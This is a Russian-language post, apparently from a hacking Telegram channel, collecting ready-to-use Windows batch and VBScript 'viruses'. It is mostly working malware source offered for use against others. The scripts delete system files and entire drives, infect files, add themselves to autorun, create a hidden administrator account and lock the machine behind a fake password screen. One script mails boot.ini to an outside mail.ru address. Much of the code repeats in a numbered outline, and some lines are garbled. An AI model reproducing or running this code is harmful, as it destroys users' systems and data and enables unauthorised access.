Удаляет все драйвера, которые установлены на компьютере
del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul

Удаляет команду DEL
del %0

Будет открывать бесконечно Paint
:x
Start mspaint
goto x

Изменяет расширение всех ярлыков на .txt
assoc .lnk=.txt

Заражает Autoexec
copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul
reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y

сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)
rundll32 user,SwapMouseButton

Удаляет ядро системы
del %systemroot%\system32\HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вирус заражает *.JPG в текущем каталоге
@echo off%[MrWeb]%
if ‘%1==’In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find «MrWeb»<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Жестокие вирусы:

У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f

Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%\temp1.vbs
echo Chr(39)>%temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp.vbs
reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\Run» /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoDrives /t REG_DWORD /d 67108863 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile «C:\ntldr»,1 >> %temp%\temp.vbs
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoSelectDownloadDir» /d 1 /f
reg add «HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoFindFiles» /d 1 /f
reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoNavButtons» /d 1 /f
echo fso.deletefolder «D:\Windows»,1 >> %temp%\temp.vbs
echo fso.deletefolder «I:\Windows»,1 >> %temp%\temp.vbs
echo fso.deletefolder «C:\Windows»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefile sr+»\system32\hal.dll»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefolder sr+»\system32\dllcache»,1 >> %temp%\temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs
echo fso.deletefolder sr+»\system32\drives»,1 >> %temp%\temp.vbs
echo s.regwrite «HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString»,»forum.whack.ru™»>>%temp%\temp.vbs
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner»,»forum.whack.ru™»>>%temp%\temp.vbs
echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization»,»forum.whack.ru™»>>%temp%\temp.vbs
echo on error resume next > %temp%\temp1.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp1.vbs
echo do>>%temp%\temp1.vbs
echo fso.getfile («A:\»)>>%temp%\temp1.vbs
echo loop>>%temp%\temp1.vbs
echo on error resume next > %temp%\temp2.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp2.vbs
echo do>>%temp%\temp2.vbs
echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%\temp2.vbs
echo loop>>%temp%\temp2.vbs
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disableregistrytools /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSetFolders /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFind /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMHelp /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRun /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoClose /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject(«shell.application»)>>%temp%\temp.vbs
echo application.minimizeall>>%temp%\temp.vbs
reg add «hklm\Software\Microsoft\Windows\CurrentVersion\run» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add «HKCR\exefile\shell\open\command» /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%\temp.vbs
echo while i^>0 or i^<0 >> %temp%\temp.vbs
echo S.popup «forum.whack.ru™»,0, «forum.whack.ru™»,0+16 >> %temp%\temp.vbs
echo i=i-1 >> %temp%\temp.vbs
echo wend >> %temp%\temp.vbs
echo do >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{capslock}» >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{numlock}» >> %temp%\temp.vbs
echo wscript.sleep 200 >> %temp%\temp.vbs
echo s.sendkeys»{scrolllock}» >> %temp%\temp.vbs
echo loop>> %temp%\temp.vbs
echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%\temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
echo For i = 0 to colCDROMs.Count — 1 >> %temp%\temp.vbs
echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
echo next >> %temp%\temp.vbs
echo End If >> %temp%\temp.vbs
echo Call SendPost(«smtp.mail.ru», «forum.whack.ru™@mail.ru», «support@mail.ru», «…», «Копм заражен!») >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject(«CDO.Message») >> %temp%\temp.vbs
echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%\temp.vbs
echo Set Flds = iConf.Fields >> %temp%\temp.vbs
echo Flds.Item(«

«) = 2 >> %temp%\temp.vbs
echo Flds.Item(«

«) = 1 >> %temp%\temp.vbs
echo Flds.Item(«

«) = «support» >> %temp%\temp.vbs
echo Flds.Item(«

«) = «support» >> %temp%\temp.vbs
echo Flds.Item(«

«) = «smtp.mail.ru» >> %temp%\temp.vbs
echo Flds.Item(«

«) = 25 >> %temp%\temp.vbs
echo Flds.Update >> %temp%\temp.vbs
echo iMsg.Configuration = iConf >> %temp%\temp.vbs
echo iMsg.To = strTo >> %temp%\temp.vbs
echo iMsg.From = strFrom >> %temp%\temp.vbs
echo iMsg.Subject = strSubject >> %temp%\temp.vbs
echo iMsg.TextBody = strBody >> %temp%\temp.vbs
echo iMsg.AddAttachment «c:\boot.ini» >> %temp%\temp.vbs
echo iMsg.Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs

echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs

Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус…
title Внимание!!!
CHCP 866
IF EXIST C:\windows\boot.bat (
goto ok )
cls
IF NOT EXIST C:\windows\boot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
ECHO. >> C:\0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
ECHO. >> C:\0.reg
ECHO «Shell»=»Explorer.exe, C:\\windows\\boot.bat » >> C:\0.reg
start/wait regedit -s C:\0.reg
del C:\0.reg
ECHO @echo off >>C:\windows\boot.bat
ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
ECHO reg add «HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
ECHO start sys.bat >>C:\windows\boot.bat
attrib +r +a +s +h C:\windows\boot.bat
copy virus.bat c:\windows\sys.bat
attrib +r +a +s +h C:\windows\sys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if «%choise%» == «101» goto gold
if «%choise%» == «200393» goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:\windows\boot.bat
del C:\windows\boot.bat
attrib -r -a -s -h C:\windows\sys.bat
del C:\windows\sys.bat
cls
:gold
start C:\
:end

Добавляет программу в автозагрузку ОС
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD

@echo off
chcp 1251
echo щаска…
color 4
@echo Вас собирается ~CENS~: ZhenyaZERO

@echo Автор вируса: ZhenyaZERO

@echo Условия: если вам попался этот файл, сразу его удаляйте. Этот файл был создан исключительно для ютуба. Использование этого видео в других целях запрещено.
pause
echo Этап 1: Создание ограничений
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ Хавно там всякое /F
del c:Program Files/q
taskkill /f /im explorer.exe >nul
echo Этап 2: Ща комп начнет глючить
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /
echo Этап 3: Прощай, винда!
del C:\ /s /q
del D:\ /s /q
del I:\ /s /q

Приветики) немного про bat-вирусы, как и обещал Но хочу заметить, что почти все Bat’ники палятся антивирусами.

itpub

Создается .Bat вирус в текстовом документе (блокнот). Прописали весь алгоритм действий, сохраняем в формате virus.bat

———————————————————————————————————————

Echo – Команда вывода на экран

Echo c:ski.bat >> autoexec.bat (Прописывает файл ski.bat в автозагрузку)

@ — запрещает показывать

Echo_inactive_inactive off — запрещает вывод всех команд на экран

for – цикл, выполняет команду указанное количество раз

do – указывает, что делать

%%i – переменная, куда подставляются значения

_______________________________________________________________________

in(1,1,100) – набор, который раскрывается в последовательность чисел от заданного начала, конца и шага

В нашем случае от 1,2,3,4,5,6,7,8…100

mkdir – создаёт папку

rmdir – удаляет папку

copy %0 x:\y — копирует вирус на диск x в папку y (пример copy %0 C:\System.bat)

Copy %0 c:ski.bat (копирует вирус только изменив названия)

label x:y — переименовывает диск x на имя y (пример label C:Disc error)

time х:у — меняет время на х часов и у минут (пример time 14:27)

date x.y.z — меняет дату на x день, y месяц, z год (пример date 16.11.05)

md х — создаст папку, в том месте, где наш вирус, с именем х

del *.* /q — удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок)

del x:\y *.* /q — удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q)

del c:Program Files/q (удаляет все файлы из этой папки)

assoc .х=.у — переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3)

ren 5-??.png 7-??.png переименование файлов 5-??.png в 7-??.png

taskkill — позволяет завершить один или несколько процессов

tskill — убить процесс

reg — непосредственная работа с реестром

logoff — Заверщить пользовательский сеанс

%SystemRoot%/system32/rundll32 user32, SwapMouseButton — Данная строчка меняет клавиши мыши местами

shutdown — выключить pc

del — удаление одного или нескольких файлов

getmac — отображает MAC-адрес одного или нескольких сетевых адаптеров компьютера

md — создание папки

msg — отправка сообщений пользователю

ren — переименование файлов и папок

rd — удаление папки

rmdir — удаление папки

reg — редактирование системного реестра

xcopy — копирование файлов и дерева папок

————————————————————————————————————————————————————————————————————————————

Примеры:

——————-

(Выведение сообщения) — привет я бат! =)

Echo_inactive_inactive Hello, i’m bat!

pause

—————————————————————-

(Создать 100 папок)

Echo_inactive_inactive off

for /l %%i in (1,1,100) do mkdir «dir %%i»

—————————————————————-

(Удалить созданные 100 папок)

Echo_inactive_inactive off

for /l %%i in (1,1,100) do rmdir «dir %%i»

—————————————————————-

(Удаляет важные файлы(не стоит использовать))

Echo_inactive_inactive off

do del «c:\windows\exploer.exe»

do del «c:\windows\mspoint.exe»

do del «c:\windows\notepad.exe»

—————————————————————-

(Удаляет все с флешки, и переименовывает ее в NEW-NAME ( или любое другое название)

del F:\ *.* /q

label F: NEW-NAME

—————————————————————-

(НЕ СТОИТ ЗЛОУПОТРЕБЛЯТЬ)

(Вирус отключает мышь и клавиатуру, высвечивает сообщение, форматирует все диски)

Echo_inactive_inactive off

rundll32 keyboard,disable

rundll32 mouse,disab

За ваши действия ответственности не несу) Применяйте с умом))

#Bat #Windows #virus #hacker

https://t.me/itpub_group

  1. Оглавление

  2. Готовые bat вирусы 2

  3. Простенькие вирусы 2

  4. Убирает рабочий стол 2

  5. Выключается компьютер 2

  6. Перезагрузка компьютера 2

  7. Запрещает запускать программы 2

  8. Удаление дров 2

  9. Удаляет звуки Windows 2

  10. Запрещает заходить в панель управления 2

  11. Запрещает комбинацию Ctrl-Alt-Delete 3

  12. Меняет местами значение кнопок мыши 3

  13. Удаляет курсор мыши 3

  14. Меняет название корзины 3

  15. Убирает панель управления 3

  16. Серьезные вирусы 4

  17. Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) 4

  18. Удаляет все файлы в program files 4

  19. Убивает процесс explorer.exe 4

  20. Создает миллион папок 4

  21. Удаляет все драйвера, которые установлены на компьютере 4

  22. Удаляет команду DEL 4

  23. Будет открывать бесконечно Пэинт 4

  24. Изменяет расширение всех ярлыков на .txt 4

  25. Заражает Autoexec 4

  26. Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить) 4

  27. сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. 4

  28. Меняет местами кнопки мыши,но обратная смена не возможна) 4

  29. Удаляет ядро системы 4

  30. Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге) 5

  31. Вирус заражает *.JPG в текущем каталоге 5

  32. Жестокие вирусы 6

  33. У вашего ламера будет глючить компьютер. 6

  34. Вирус который убивает Винду. Не проверяйте на своем компьютере=) 7

  35. Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует) 11

  36. Добавляет программу в автозагрузку ОС 12

  37. Создаем вирус 13

  38. Команды для BAT-файлов 15

  39. Готовые bat вирусы

  40. Здесь готовые Bat-вирусы. Просто вставляем код в bat файл и все, если не знаете как создать bat файл читаем тут

  41. Простенькие вирусы

  42. Убирает рабочий стол

  43. @echo off

  44. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

  45. Выключается компьютер

  46. @echo off

  47. shutdown -s -t 1 -c «lol» >nul

  48. Перезагрузка компьютера

  49. @echo off

  50. shutdown -r -t 1 -c «lol» >nul

  51. Запрещает запускать программы

  52. @echo off

  53. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

  54. Удаление дров

  55. @echo off

  56. del «%SystemRoot%\Driver Cache\i386\driver.cab» /f /q >nul

  57. Удаляет звуки Windows

  58. @echo off

  59. del «%SystemRoot%\Media» /q >nul

  60. Запрещает заходить в панель управления

  61. @echo off

  62. reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer

  63. /v NoControlPanel /t REG_DWORD /d 1 /f >nul

  64. Запрещает комбинацию Ctrl-Alt-Delete

  65. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

  66. Меняет местами значение кнопок мыши

  67. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

  68. Удаляет курсор мыши

  69. del «%SystemRoot%Cursors*.*» >nul

  70. Меняет название корзины

  71. reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

  72. Убирает панель управления

  73. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

  74. Серьезные вирусы

  75. Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)

  76. rd [Буква_Диск]: /s /q

  77. Удаляет все файлы в program files

  78. del c:Program Files/q

  79. Убивает процесс explorer.exe

  80. taskkill /f /im explorer.exe >nul

  81. Создает миллион папок

  82. FOR /L %%i IN (1,1,1000000) DO md %%i

  83. Удаляет все драйвера, которые установлены на компьютере

  84. del «%SystemRoot%Driver Cachei386driver.cab» /f /q >nul

  85. Удаляет команду DEL

  86. del %0

  87. Будет открывать бесконечно Пэинт

  88. :x

  89. Start mspaint

  90. goto x

  91. Изменяет расширение всех ярлыков на .txt

  92. assoc .lnk=.txt

  93. Заражает Autoexec

  94. copy «»%0″» «%SystemRoot%\system32\batinit.bat» >nul

  95. reg add «HKCU\SOFTWARE\Microsoft\Command Processor» /v AutoRun /t REG_SZ /d «%SystemRoot%\syste m32\batinit.bat» /f >nul

  96. Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

  97. @echo off

  98. chcp 1251

  99. net user SUPPORT_388945a0 /delete

  100. net user hacker hack /add

  101. net localgroup Администраторы hacker /add

  102. net localgroup Пользователи SUPPORT_388945a0 /del

  103. reg add «HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList» /v «support» /t reg_dword /d 0 y

  104. сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.

  105. rundll32 user,disableoemlayer

  106. Меняет местами кнопки мыши,но обратная смена не возможна)

  107. rundll32 user,SwapMouseButton

  108. Удаляет ядро системы

  109. del %systemroot%\system32\HAL.dll

  110. Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге)

  111. @echo off%[MrWeb]%

  112. if ‘%1==’In_ goto MrWebin

  113. if exist c:\MrWeb.bat goto MrWebru

  114. if not exist %0 goto MrWeben

  115. find «MrWeb»<%0>c:\MrWeb.bat

  116. attrib +h c:\MrWeb.bat

  117. :MrWebru

  118. for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben

  119. :MrWebin

  120. if exist %2.bat goto MrWeben

  121. type c:\MrWeb.bat>>%2.bat

  122. echo start %2>>%2.bat%[MrWeb]%

  123. :MrWeben

  124. Вирус заражает *.JPG в текущем каталоге

  125. @echo off%[MrWeb]%

  126. if ‘%1==’In_ goto MrWebin

  127. if exist c:\MrWeb.bat goto MrWebru

  128. if not exist %0 goto MrWeben

  129. find «MrWeb»<%0>c:\MrWeb.bat

  130. attrib +h c:\MrWeb.bat

  131. :MrWebru

  132. for %%g in (*.jpg) do call c:\MrWeb In_ %%g

  133. goto MrWeben

  134. :MrWebin

  135. if exist %2.bat goto MrWeben

  136. type c:\MrWeb.bat>>%2.bat

  137. echo start %2>>%2.bat%[MrWeb]%

  138. :MrWeben

  139. Жестокие вирусы

  140. У вашего ламера будет глючить компьютер.

  141. @echo off

  142. echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%\windows\system32\rundll32.vbs

  143. echo do >> %systemdrive%\windows\system32\rundll32.vbs

  144. echo Set tx = fso.CreateTextFile(«%systemdrive%\windows\system32\rundll32.dat», True) >> %systemdrive%\windows\system32\rundll32.vbs

  145. echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs

  146. echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs

  147. echo FSO.DeleteFile «%systemdrive%\windows\system32\rundll32.dat» >> %systemdrive%\windows\system32\rundll32.vbs

  148. echo loop >> %systemdrive%\windows\system32\rundll32.vbs

  149. start %systemdrive%\windows\system32\rundll32.vbs

  150. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f

  151. Вирус который убивает Винду. Не проверяйте на своем компьютере=)

  152. @echo This virus created by LIZA

  153. @echo Virus: pcforumhack.ru™ Virus

  154. @echo Autor: LIZA

  155. @echo off

  156. echo Chr(39)>%temp%\temp1.vbs

  157. echo Chr(39)>%temp%\temp2.vbs

  158. echo on error resume next > %temp%\temp.vbs

  159. echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp.vbs

  160. echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp.vbs

  161. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0

  162. copy %¶§% %SystemRoot%\user32dll.bat

